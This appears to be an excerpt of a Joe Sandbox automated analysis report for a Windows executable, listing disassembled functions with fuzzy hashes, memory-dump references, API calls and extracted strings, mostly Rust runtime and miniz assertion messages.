                                                                                                        • a formatting trait implementation returned an error when the underlying stream did notlibrary\alloc\src\fmt.rs, xrefs: 00007FF79E97BAF5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: a formatting trait implementation returned an error when the underlying stream did notlibrary\alloc\src\fmt.rs$called `Result::unwrap()` on an `Err` valueErrorLayoutError$capacity overflow
                                                                                                        • API String ID: 0-1329486492
                                                                                                        • Opcode ID: 6c4d2e56daff0ecd167304263bbc487717256c1edb8efd0f07cef1487183eecf
                                                                                                        • Instruction ID: 56bacf099f92ddc47e1b4b6e67318c249a5a3f1358aadcf0b7d9485c369e5d07
                                                                                                        • Opcode Fuzzy Hash: 6c4d2e56daff0ecd167304263bbc487717256c1edb8efd0f07cef1487183eecf
                                                                                                        • Instruction Fuzzy Hash: 96A27962F04BA145F721AB3498822BCA761BF5A7E4F844334EE5D23B96DF39D2458370
                                                                                                        Function 00007FF79E982030 Relevance: 11.7, Strings: 9, Instructions: 442COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs
                                                                                                        • API String ID: 0-3544694999
                                                                                                        • Opcode ID: 4b3ec176b76211cd2a10c7cdccc78feed1dd0a790ac80f4a690f6e5a2fb89574
                                                                                                        • Instruction ID: bb773bace13bffe25bc8fad44d58f2974a348e300420e11349ed8cca5d12532a
                                                                                                        • Opcode Fuzzy Hash: 4b3ec176b76211cd2a10c7cdccc78feed1dd0a790ac80f4a690f6e5a2fb89574
                                                                                                        • Instruction Fuzzy Hash: ACF117A2B04B8586EB24DFB5E8817F8A751FB487E8F804036DE4D57BA4CE38D545C360
                                                                                                        Function 00007FF79E951A40 Relevance: 10.9, APIs: 7, Instructions: 370COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FullNamePath
                                                                                                        • String ID:
                                                                                                        • API String ID: 2482867836-0
                                                                                                        • Opcode ID: 68181311d1e7affc7036209678d29e24dd506b2e5666e0de4cbbfc831251b7dd
                                                                                                        • Instruction ID: 51d592dabcd2f8c2502848185652a0dafcad0ec791755652559a65922d70a43d
                                                                                                        • Opcode Fuzzy Hash: 68181311d1e7affc7036209678d29e24dd506b2e5666e0de4cbbfc831251b7dd
                                                                                                        • Instruction Fuzzy Hash: 45E18162A08B8145EB75AB72D8857B9A365BF45BE8F848035DE4C077D9DF3CD5808331
                                                                                                        Function 00007FF79E97F0A0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 237COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID: .$0$FFFFFFFF
                                                                                                        • API String ID: 368790112-1041323599
                                                                                                        • Opcode ID: a56e8d3bfd3cf167d08e5c5ecfb22bd97bd007709b8def7d651857b46c407b8b
                                                                                                        • Instruction ID: 9745f6689f4d38c541bab2b4166aeff7e87d9f0a1863aee4c30e535920f8bc1d
                                                                                                        • Opcode Fuzzy Hash: a56e8d3bfd3cf167d08e5c5ecfb22bd97bd007709b8def7d651857b46c407b8b
                                                                                                        • Instruction Fuzzy Hash: 5D910662B0968145FB75EB75C5903BCA792BB427F4FC44231CE2E267C4DE2EA5498232
                                                                                                        Function 00007FF79E9A7330 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 425COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _assert
                                                                                                        • String ID: !d->m_output_flush_remaining$/$d->m_pOutput_buf < d->m_pOutput_buf_end$miniz.c
                                                                                                        • API String ID: 1222420520-939395013
                                                                                                        • Opcode ID: a487f9df0897c6ae8324075d8e35fc5177824fb5c02a170f67c9abbfe35eaa34
                                                                                                        • Instruction ID: 33df10e44972dfb6c615cbc3ff75d0e9f84b0c2982f7cbdd20bbe10871ef7c22
                                                                                                        • Opcode Fuzzy Hash: a487f9df0897c6ae8324075d8e35fc5177824fb5c02a170f67c9abbfe35eaa34
                                                                                                        • Instruction Fuzzy Hash: FA125F73A04646CBD768EF39C48166C7BA2FB54B58F848139CE4943788EB39E845CB61
                                                                                                        Function 00007FF79E92D520 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 360COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00007FF79E92D5A5
                                                                                                        • memcpy.MSVCRT ref: 00007FF79E92D639
                                                                                                        • memset.MSVCRT ref: 00007FF79E92EBED
                                                                                                          • Part of subcall function 00007FF79E950EF0: GetStdHandle.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF79E950F1F
                                                                                                          • Part of subcall function 00007FF79E950EF0: GetLastError.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF79E950F2F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ErrorHandleLastmemcpy
                                                                                                        • String ID: assertion failed: filled <= self.buf.init
                                                                                                        • API String ID: 4037564346-906094691
                                                                                                        • Opcode ID: 93abf614279afb875334d376a501014e7fc199743063c094d7dad7027cce985f
                                                                                                        • Instruction ID: 93934733c9d6c3e208077f9b20a81c3d60214fbb9c6dcf3fd846bd398c48fdf2
                                                                                                        • Opcode Fuzzy Hash: 93abf614279afb875334d376a501014e7fc199743063c094d7dad7027cce985f
                                                                                                        • Instruction Fuzzy Hash: 33C1F362F05B4146EE35EB72A8806B9A7A1BB44BA4F948836DE0D53741DE3CE491C231
                                                                                                        Function 00007FF79E9A7FA0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 429COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _assert
                                                                                                        • String ID: bits <= ((1U << len) - 1U)$code < TDEFL_MAX_HUFF_SYMBOLS_2$miniz.c
                                                                                                        • API String ID: 1222420520-2298030977
                                                                                                        • Opcode ID: c075d9dd20240d24c3aa77f113a6d644868bbeba7f4ba79e2041725402f427c6
                                                                                                        • Instruction ID: e39ad8619654fb90dd6c64f61f69e60112d4ec8d4aaf205b2731147db56d945e
                                                                                                        • Opcode Fuzzy Hash: c075d9dd20240d24c3aa77f113a6d644868bbeba7f4ba79e2041725402f427c6
                                                                                                        • Instruction Fuzzy Hash: BC02D572A0C29197D7399E38C4886BDBBA2FB50B58FD48135CEC947688DF79D806C721
                                                                                                        Function 00007FF79E93DA50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 176COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF79E93DA2F), ref: 00007FF79E93DA7D
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF79E93DA2F), ref: 00007FF79E93DC10
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFrequencyLastPerformanceQuery
                                                                                                        • String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                                                                                        • API String ID: 3362413890-1633623230
                                                                                                        • Opcode ID: e110d0550d4be53cca64662aa36c9b3c1f6baef898b34e672dcbe532d5d85635
                                                                                                        • Instruction ID: 92a4b4c98c685b9c56d2187225bf42665e57116e4adb11661e9347c70abd3c33
                                                                                                        • Opcode Fuzzy Hash: e110d0550d4be53cca64662aa36c9b3c1f6baef898b34e672dcbe532d5d85635
                                                                                                        • Instruction Fuzzy Hash: 63610532B2869249FB35FB74D9907BDA375AF843A0FC4A031DD0E06B95DE2CA9408371
                                                                                                        Function 00007FF79E97F840 Relevance: 5.4, Strings: 4, Instructions: 356COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FFFFFFFF$FFFFFFFF$cannot parse float from empty stringinvalid float literalassertion failed: edelta >= 0library\core\src\num\diy_float.rs$d
                                                                                                        • API String ID: 0-1258069422
                                                                                                        • Opcode ID: b919c37030ce28c58c3e421755fbc5dbe9e22fe64c590991e85f27ef456516ef
                                                                                                        • Instruction ID: 9fc0358109eb26d33e78374f639157d0d80318eb0efa9b4d5b5a27e9f0d62947
                                                                                                        • Opcode Fuzzy Hash: b919c37030ce28c58c3e421755fbc5dbe9e22fe64c590991e85f27ef456516ef
                                                                                                        • Instruction Fuzzy Hash: B4C15962F0869585EA749B3584907B8AB90BB13BF4FCD4231DE6D233D0EA3E9549C331
                                                                                                        Function 00007FF79E979920 Relevance: 5.3, Strings: 4, Instructions: 306COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$Authenti$GenuineI$HygonGen
                                                                                                        • API String ID: 0-1540695585
                                                                                                        • Opcode ID: 497cf9bde67d657714d30a6a9e4ea4508630fa734bc516074808672686d99aab
                                                                                                        • Instruction ID: 9ab4315bdf4642347ece8446175a03272a4f3bb05578ff1cc8949001ad8c8e91
                                                                                                        • Opcode Fuzzy Hash: 497cf9bde67d657714d30a6a9e4ea4508630fa734bc516074808672686d99aab
                                                                                                        • Instruction Fuzzy Hash: 61919BA3B2595102FF5C85A9AC72BBA4992B3587D8F48A03DED5F97BC4DC7CC9108210
                                                                                                        Function 00007FF79E8FEDB4 Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 596COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: assertion failed: code < MAX_HUFF_SYMBOLS_2
                                                                                                        • API String ID: 2221118986-707042715
                                                                                                        • Opcode ID: a38dcf0db5251079c23e625c0f0856a6bfee7fb2089e4bc8dcb93148aa4ec43e
                                                                                                        • Instruction ID: 40b07363cf72773edfaab034a40eab992210dcc97de5b54238fccffc0d0e5d32
                                                                                                        • Opcode Fuzzy Hash: a38dcf0db5251079c23e625c0f0856a6bfee7fb2089e4bc8dcb93148aa4ec43e
                                                                                                        • Instruction Fuzzy Hash: 6742F532A0868241E630EBB1E481BFAA751FBA5794FC45432EE4D07BA6CE3CD555C7B0
                                                                                                        Function 00007FF79E9695B6 Relevance: 5.1, Strings: 4, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: wCGR$wCGR$wCGR$wCGR
                                                                                                        • API String ID: 0-1544543998
                                                                                                        • Opcode ID: b76849e2c63d6d30d82bc14477643e3235ad5eb05f076e6cf90bd5cefba32814
                                                                                                        • Instruction ID: b86cfed6b26c6b2e6c63a7fe09cb8e02acdf407203276dfdf7c02677753cc611
                                                                                                        • Opcode Fuzzy Hash: b76849e2c63d6d30d82bc14477643e3235ad5eb05f076e6cf90bd5cefba32814
                                                                                                        • Instruction Fuzzy Hash: 2821E513F1C4E64AE770963E60C077DAFD28B4AF94BA8C032C1894A6D4C93AA803D771
                                                                                                        Function 00007FF79E98A0E0 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 340COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                                                        • API String ID: 2221118986-3825506207
                                                                                                        • Opcode ID: 2ee8c62daf8919137ebe3993411475a7d742ad96e406f9c8ee6e6c9c5bbcabfd
                                                                                                        • Instruction ID: 6bc87145fccdcd88eda183ef2869b74dd66fbe9f0f6b8f14dae1c122bdffe321
                                                                                                        • Opcode Fuzzy Hash: 2ee8c62daf8919137ebe3993411475a7d742ad96e406f9c8ee6e6c9c5bbcabfd
                                                                                                        • Instruction Fuzzy Hash: C2C18D5270466545DF589F3AA801279AB65FB88BF4F809332EE2E87BF4E93CD544C321
                                                                                                        Function 00007FF79E96D887 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • fcwfswxmm16xmm17xmm18xmm19xmm20xmm21xmm22xmm23xmm24xmm25xmm26xmm27xmm28xmm29xmm30xmm31k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17, xrefs: 00007FF79E96DBC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmp
                                                                                                        • String ID: fcwfswxmm16xmm17xmm18xmm19xmm20xmm21xmm22xmm23xmm24xmm25xmm26xmm27xmm28xmm29xmm30xmm31k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17
                                                                                                        • API String ID: 1475443563-1161499575
                                                                                                        • Opcode ID: c263884aa9e3057750cdec65988fce9bccec6885e3903c3fde1f5f5258ffec36
                                                                                                        • Instruction ID: 09d1b925ac0723f22d360479a89fcc3aca0ce0d9260ca150b995f093e6bdce62
                                                                                                        • Opcode Fuzzy Hash: c263884aa9e3057750cdec65988fce9bccec6885e3903c3fde1f5f5258ffec36
                                                                                                        • Instruction Fuzzy Hash: 27A1A24191C4F648E3343F31909077AABA2EB1FF59BDA5433DAA94E9C4C95EA141F232
                                                                                                        Function 00007FF79E9A15DD Relevance: 4.7, Strings: 2, Instructions: 2158COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
